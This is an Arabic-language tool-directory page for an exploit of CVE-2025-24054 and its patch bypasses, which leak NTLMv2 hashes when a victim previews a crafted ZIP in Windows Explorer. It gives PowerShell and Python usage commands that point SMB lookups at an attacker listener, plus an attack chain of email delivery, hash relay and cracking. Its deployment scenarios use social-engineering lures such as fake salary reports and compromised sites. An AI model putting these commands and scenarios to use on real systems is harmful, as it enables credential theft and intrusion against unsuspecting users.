Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24054 — كشف هاش NTLMv2-SSP بدون نقرات في Windows File Explorer | Kitploit
أدوات/GitHubGitHub/untouchable17/cve-2025-24054
كسر كلمات المرورأدوات التصيدتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالالهندسة الاجتماعية
GitHubuntouchable17/cve-2025-24054

CVE-2025-24054

كشف هاش NTLMv2-SSP بدون نقرات في Windows File Explorer

عرض المستودع
21منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

كشف تجزئة NTLMv2-SSP بدون نقرة في مستكشف Windows

🎥 عرض توضيحي POC + تجاوز تصحيح مارس 2025

عرض توضيحي لكشف تجزئة NTLMv2

🎥 تجاوز التصحيح

عرض توضيحي لكشف تجزئة NTLMv2

انقر على الصورة أعلاه لمشاهدة العرض التوضيحي للثغرة

📋 نظرة عامة تقنية

يوفر هذا المستودع إطار بحث شامل لتحليل سلسلة الثغرات في معالجة تنسيقات الملفات بواسطة Windows Shell والتي تؤدي إلى كشف بيانات اعتماد NTLMv2-SSP. تنفّذ الأداة ناقلين هجوميين متميزين يستغلان التحليل التلقائي لمسارات UNC أثناء عمليات معاينة الملفات في مستكشف Windows.

آلية الثغرة الأساسية

تكمن مشكلة الأمان الأساسية في المعالجة التلقائية من جانب Windows Shell لمسارات UNC المضمّنة داخل تنسيقات ملفات محددة أثناء عمليات المعاينة. عندما يفتح المستخدم أرشيفات ZIP تحتوي على ملفات مصممة بعناية، يقوم مستكشف Windows تلقائيًا بتحليل مسارات UNC دون موافقة المستخدم، مما يؤدي إلى بدء محاولات مصادقة SMB وكشف تجزئات NTLMv2-SSP لخوادم يتحكم فيها المهاجم.

مكونات سطح الهجوم

  • تحليل تنسيقات الملفات: المعالجة التلقائية من Windows Shell لملفات shell المستندة إلى XML وخصائص اختصارات LNK
  • تجاوز حاوية ZIP: وظيفة معاينة الأرشيف التي تلتف على حمايات Mark-of-the-Web (MOTW)
  • مشغّل المصادقة: التحليل التلقائي لـ UNC أثناء استخراج البيانات الوصفية وعمليات جلب الأيقونات

🏗️ تطور البنية

🔰 المرحلة 1: الكشف عبر SearchConnector (CVE-2025-24054)

الملف: ntlm-disclosure-poc.py

يستغل هذا التنفيذ الأولي ملفات Windows Search Connector (.searchConnector-ms)، وهي ملفات إعدادات تستند إلى XML تحدد مواقع البحث لمستكشف Windows. تظهر الثغرة عندما يعالج Windows تلقائيًا مسار UNC المضمّن في عنصر simpleLocation أثناء عمليات معاينة أرشيف ZIP.

الخصائص التقنية:

  • بنية حمولة تستند إلى XML وفق مواصفات مخطط Microsoft
  • تضمين مسار UNC في عناصر searchConnectorDescription
  • معالجة تلقائية بواسطة Windows Search Indexer وواجهة Explorer
  • تجاوز قيود تنفيذ الملفات التقليدية

🔰 المرحلة 2: تجاوز LNK داخل ZIP (CVE-2025-50154 / CVE-2025-59214)

الملف: patch_bypass.ps1

تعالج هذه التقنية المطوّرة التصحيح الأولي من مايكروسوفت عبر استغلال خصائص ملفات LNK. يستغل الهجوم سلوك مستكشف Windows في جلب البيانات الوصفية للأيقونات وتحليل المسارات المستهدفة أثناء معاينة ملفات ZIP، مع الحفاظ على ناقل الاستغلال بدون نقرة من خلال تهيئة دقيقة للخصائص.

الخصائص التقنية:

  • ملفات LNK تحتوي على مسارات UNC في خاصية TargetPath
  • مراجع أيقونات محلية لتجاوز آليات الاكتشاف الأولية
  • استخراج تلقائي للخصائص عبر Windows Shell أثناء المعاينة
  • الحفاظ على شرعية تنسيق الملف مع تحقيق تحليل UNC

🔧 المتطلبات الأساسية

لـ Python PoC:
  • Python 3.6+
  • الحزم المطلوبة: colorama
لـ PowerShell PoC:
  • Windows PowerShell 5.1+
  • سياسة التنفيذ: Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

🔰 المرحلة 1: التنفيذ باستخدام Python (CVE-2025-24054)

root@kitploit:~
# Basic usage
python ntml-disclosure-poc.py 192.168.1.100

# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip

# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip

المعلمات target (مطلوب): عنوان IP أو اسم المضيف الهدف -o, --output: اسم ملف إخراج مخصص لحزمة ZIP

root@kitploit:~

### 🔰 المرحلة 2: تجاوز PowerShell (CVE-2025-50154/59214)

Basic usage - LNK file auto-removed

.\bypass.ps1 -IP 192.168.1.100

Keep LNK file for external distribution

.\bypass.ps1 -IP 192.168.1.100 -KeepLnk

Custom lure name and share

.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk

Specify output directory

.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk

root@kitploit:~


المعلمات
-IP (مطلوب): عنوان IP لخادم SMB الهدف
-Share: اسم مشاركة SMB (الافتراضي: 'share')
-File: اسم الملف الهدف (الافتراضي: 'payload.exe')
-Lure: اسم ملف الهندسة الاجتماعية (الافتراضي: 'Your_File_For_Payload_Here')
-OutDir: دليل الإخراج (الافتراضي: الدليل الحالي)
-KeepLnk: الاحتفاظ بملف LNK بعد إنشاء ZIP
root@kitploit:~
graph TD
    A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
    B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
    C --> D[🛡️ Microsoft Patch]
    D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
    E --> F[🔴 Current State<br/>Active Exploitation]
    
    style A fill:#ffcccc
    style C fill:#ffddcc
    style E fill:#ffffcc
    style F fill:#ccffcc

🔧 المواصفات التقنية

  1. 📦 توليد الحمولة
    • إنشاء ملف خبيث (SearchConnector/LNK) بمسار UNC
    • حزمه في أرشيف ZIP باسم جذاب
  2. 📤 التسليم
    • توزيع ZIP عبر البريد الإلكتروني/الويب/التنزيل
  3. 💥 الاستغلال
    • يفتح الضحية ZIP في مستكشف Windows
    • تؤدي معاينة الملف التلقائية إلى تحليل مسار UNC
    • يتم إرسال تجزئة NTLMv2-SSP إلى المهاجم
  4. 🎭 ما بعد الاستغلال
    • التقاط التجزئات وهجمات إعادة التوجيه (relay)
    • محاولات كسر كلمات المرور

💀 سيناريوهات النشر

📨 السيناريو 1: توزيع ZIP مباشر

root@kitploit:~
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"

# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments

🔄 السيناريو 2: نقل ملف LNK

root@kitploit:~
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk

# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites

🎯 السيناريو 3: هندسة اجتماعية موجهة

root@kitploit:~
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk

تواصل مع المطوّر

root@kitploit:~
- Group & Contact: t.me/initial_persistence
- Email: [email protected]
تنزيل الأداة
ناقل الهجومآلية التفعيلتفاعل المستخدمحالة التصحيح
🔗 SearchConnectorتحليل XML + تحليل UNCفتح ZIP🛡️ تم التصحيح
📎 LNK TargetPathجلب البيانات الوصفية للأيقونةفتح ZIP🔴 نشط